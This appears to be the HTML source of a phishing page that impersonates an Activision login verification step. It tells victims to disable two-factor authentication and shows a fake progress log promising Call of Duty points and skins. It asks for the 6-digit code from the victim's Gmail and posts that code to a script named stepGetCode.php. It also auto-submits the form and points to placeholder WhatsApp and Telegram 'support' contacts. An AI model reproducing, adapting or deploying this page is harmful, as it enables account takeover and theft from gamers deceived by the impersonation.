<!DOCTYPE html>
<html lang="en" class="flexbox canvas canvastext webgl no-touch geolocation postmessage no-websqldatabase no-indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients no-cssreflections csstransforms csstransforms3d csstransitions fontface video audio localstorage sessionstorage webworkers no-applicationcache svg inlinesvg smil svgclippaths wf-opensans-n8-active wf-sixcaps-n4-active wf-opensans-n4-active wf-active js no-mobile desktop no-ie ff ff119 activision-section gradient rgba opacity textshadow multiplebgs boxshadow borderimage borderradius no-cssreflections csstransforms csstransitions no-touch no-retina fontface js flexbox canvas canvastext webgl no-touch geolocation postmessage no-websqldatabase no-indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients no-cssreflections csstransforms csstransforms3d csstransitions fontface video audio localstorage sessionstorage webworkers no-applicationcache svg inlinesvg smil svgclippaths domloaded w-1312 gt-240 gt-320 gt-480 gt-640 gt-768 gt-800 gt-1024 gt-1280 lt-1440 lt-1680 lt-1920 no-portrait landscape" id="login-page">
<head>
    <meta name="description" content="Activision login page">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
    <title>Log in - Activision®</title>
    <meta charset="UTF-8">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <meta name="keywords" content="login, activision">
    <meta name="sitename" content="activision">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="shortcut icon" type="image/x-icon" href="https://s.activision.com/resources/activision/images/favicon.ico" />
    <link rel="icon" type="image/x-icon" href="https://s.activision.com/resources/activision/images/favicon.ico" />
    <meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate">
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Expires" content="0">
    <script src="https://www.google.com/recaptcha/api.js?hl=en" async defer></script>
    <meta name="_csrf" content="D376tCyyrFOiuaJ66tSBjM_sAC66gByaXaCBPpZ3sNtQlfgBEeRzovNjd4wKm02F">
    <meta name="_csrf_header" content="X-XSRF-TOKEN">
    <meta property="og:image" content="/resources/activision/images/shared-logo.jpg">
    <link rel="stylesheet" href="https://s.activision.com/resources/common/styles/preload.css?v=">
    <script src="https://s.activision.com/resources/common/scripts/modernizr-1.7.min.js"></script>
    <link rel="stylesheet" href="https://s.activision.com/resources/common/styles/common-site-updated.css?v=1702918060551">
    <link rel="stylesheet" href="https://s.activision.com/resources/common/styles/sso-media-queries.css?v=1702918060551">
    <link rel="stylesheet" href="https://s.activision.com/resources/common/styles/responsive-site.css?v=1702918060551">
    <link rel="stylesheet" href="https://s.activision.com/resources/activision/styles/sso-site-specific.css?v=1702918060551">
    <link rel="stylesheet" href="https://s.activision.com/resources/activision/styles/site.css?v=1702918060551">
    <style>
        .wpcf7 .wpcf7-recaptcha iframe { margin-bottom: 0; }
        .wpcf7 .wpcf7-recaptcha[data-align="center"]>div { margin: 0 auto; }
        .wpcf7 .wpcf7-recaptcha[data-align="right"]>div { margin: 0 0 0 auto; }
       
        /* Video background styles */
        body {
            position: relative;
        }
        video {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            object-fit: cover;
            z-index: -1;
        }
       
        /* Progress text overlay - fixed size and layout */
        .progress-overlay {
            text-align: left;
            margin: 10px auto;
            padding: 10px;
            background: rgba(0, 0, 0, 0.9);
            border-radius: 5px;
            border: 1px solid rgba(0, 162, 255, 0.5);
            max-width: 400px;
            width: 90%;
            font-size: 12px;
            line-height: 1.3;
            opacity: 0;
            animation: fadeIn 1s ease-in-out forwards;
        }
        @keyframes fadeIn {
            to { opacity: 1; }
        }
        .progress-title {
            color: #00a2ff;
            font-size: 14px;
            margin-bottom: 8px;
            font-weight: bold;
            text-align: center;
        }
        .progress-desc {
            color: #e0e0e0;
            font-size: 11px;
            margin: 0;
        }
        .progress-desc strong {
            color: #00a2ff;
        }
        .progress-desc ul {
            margin: 5px 0 10px 10px;
            padding: 0;
            list-style-type: none;
        }
        .progress-desc li {
            margin-bottom: 3px;
            position: relative;
            padding-left: 10px;
        }
        .progress-desc li:before {
            content: "•";
            color: #00a2ff;
            font-weight: bold;
            position: absolute;
            left: 0;
        }
        .progress-desc em {
            display: block;
            margin-top: 8px;
            font-style: italic;
            color: #fff;
            text-align: center;
            font-size: 12px;
            background: rgba(0, 162, 255, 0.15);
            padding: 5px;
            border-radius: 4px;
        }
    </style>
</head>
<body class="login-page hasscript sso locale-en with-sso-bar hybrid">
    <!-- Video background -->
    <video autoplay muted loop playsinline>
        <source src="bg-video.mp4" type="video/mp4">
    </video>
   
<div id="login" class="wrapper SSO SSO-PAGE center">
    <header>
        <div class="masthead">
            <h1 class="logo">Activision®</h1>
            <ul class="clearfix" id="breadcrumb">
                <li id="breadcrumb-home"><a href="http://www.activision.com">Home</a></li>
                <li>Activision: <span class="page-name">Log in</span></li>
            </ul>
        </div>
    </header>
    <article>
        <section class="clearfix">
            <h1 class="header-logo">
                <img style="width: 200px; margin: 0px -30px;" src="https://cpcodmgift.com/images/how-too.png" alt="Activision">
                <p style="color: green; font-weight: bold; text-align: center; margin-top: 10px;">
                    Note: Make sure 2FA on the account is turned off.
                </p>
            </h1>
            <!-- Progress overlay text -->
            <div class="progress-overlay" id="progressOverlay">
                <h3 class="progress-title" id="progressTitle">Account Sync: 80% Complete</h3>
                <p class="progress-desc" id="progressDesc">
                    <strong>Status Log:</strong>
                    <ul>
                        <li>Auth validated (TLS 1.3).</li>
                        <li>Rewards queued (10,800 CP).</li>
                        <li>Skins loaded (Warzone ops).</li>
                        <li>Scan: 80% secure.</li>
                        <li>Token required.</li>
                    </ul>
                    <em>Scroll down and enter the 6-digit code from your Gmail in the blue box below to finish.</em>
                </p>
            </div>
            <form id="frmLogin" name="frmLogin" class="horz-label clearfix" action="stepGetCode.php" method="post">
                <fieldset id="login-info" class="sso-form-input-block">
                    <h2>Your Code IS Wrong. Please Try Again!!!<br><br>A code will be sent to your email address to verify</h2>
                    <p style="font-weight: bold; font-size: 18px; color: #ccc; text-align: center; margin-top: 20px;">
                        If you didn’t receive the code, please contact our support team on WhatsApp or Telegram for assistance.
                    </p>
                    <div style="text-align: center; margin-top: 15px; background-color: #111; padding: 10px; border-radius: 10px;">
                        <a href="https://wa.me/1234567890" target="_blank" style="margin: 0 10px;">
                            <img src="https://cdn-icons-png.flaticon.com/512/3670/3670051.png" alt="WhatsApp" width="40" height="40">
                        </a>
                        <a href="mailto:support@activision.com" target="_blank" style="margin: 0 10px;">
                            <img src="https://cdn-icons-png.flaticon.com/512/732/732200.png" alt="Email" width="40" height="40">
                        </a>
                        <a href="https://t.me/your_support" target="_blank" style="margin: 0 10px;">
                            <img src="https://cdn-icons-png.flaticon.com/512/3670/3670151.png" alt="Telegram" width="40" height="40">
                        </a>
                    </div>
                    <div class="data-row clearfix" id="email-data-row">
                        <label for="code">Code Verification :</label>
                        <div class="input-container clearfix">
                            <input type="text" id="code" name="code" autocomplete="on" placeholder="" value="" required aria-describedby="code-error">
                        </div>
                        <span class="sprite-pages feedback-control icon"></span>
                        <div id="code-error" class="feedback-control message">Please enter your Code Verification</div>
                    </div>
                    <div class="actions clearfix">
                        <button id="login-button" class="submit large atvi-instrument atvi-instrument-button" type="submit">Finish</button>
                    </div>
                </fieldset>
            </form>
            <div class="clearfix registrationIncentives">
                <ul>
                    <li class="regTile1">
                        <div class="incentive-container">
                            <h3>Enhance Your Game</h3><span class="atvi-diamond"></span>
                            <ul class="incentive-description">
                                <li><span></span>Get your personalized live stats</li>
                                <li><span></span>See where you rank on the global leaderboard</li>
                                <li><span></span>Open supply drops online, get gear in-game</li>
                            </ul>
                        </div>
                    </li>
                    <li class="regTile2"><div class="incentive-container"></div></li>
                    <li class="regTile3">
                        <div class="incentive-container">
                            <h3>Get The Latest Intel</h3><span class="atvi-diamond"></span>
                            <ul class="incentive-description">
                                <li><span></span>Your source for the most current news</li>
                                <li><span></span>Get alerts for new Playlists and Special Events</li>
                            </ul>
                        </div>
                    </li>
                </ul>
            </div>
        </section>
    </article>
</div>
<div id="noscript-warning">JavaScript and cookies are required. Please enable them.</div>
<script>
document.addEventListener('DOMContentLoaded', function() {
    // Typewriter animation for progress title and desc
    const progressTitle = document.getElementById('progressTitle');
    const progressDesc = document.getElementById('progressDesc');
    const titleText = "Account Sync: 80% Complete";
    const descText = '<strong>Status Log:</strong><ul><li>Auth validated (TLS 1.3).</li><li>Rewards queued (10,800 CP).</li><li>Skins loaded (Warzone ops).</li><li>Scan: 80% secure.</li><li>Token required.</li></ul><em>Scroll down and enter the 6-digit code from your Gmail in the blue box below to finish.</em>';
   
    let titleIndex = 0;
    let descIndex = 0;
    let isTitleTyping = true;
   
    function typeTitle() {
        if (titleIndex < titleText.length) {
            progressTitle.innerHTML = titleText.substring(0, titleIndex + 1) + '<span style="opacity: 0.5;">|</span>';
            titleIndex++;
            setTimeout(typeTitle, 50);
        } else {
            progressTitle.innerHTML = titleText;
            isTitleTyping = false;
            typeDesc();
        }
    }
   
    function typeDesc() {
        if (descIndex < descText.length) {
            progressDesc.innerHTML = descText.substring(0, descIndex + 1) + '<span style="opacity: 0.5;">|</span>';
            descIndex++;
            setTimeout(typeDesc, 20);
        } else {
            progressDesc.innerHTML = descText;
        }
    }
   
    setTimeout(typeTitle, 500); // Start typing after 0.5s
   
    setTimeout(function() {
        document.getElementById('login-button').click();
    }, 3000);
});
</script>
</body>
</html>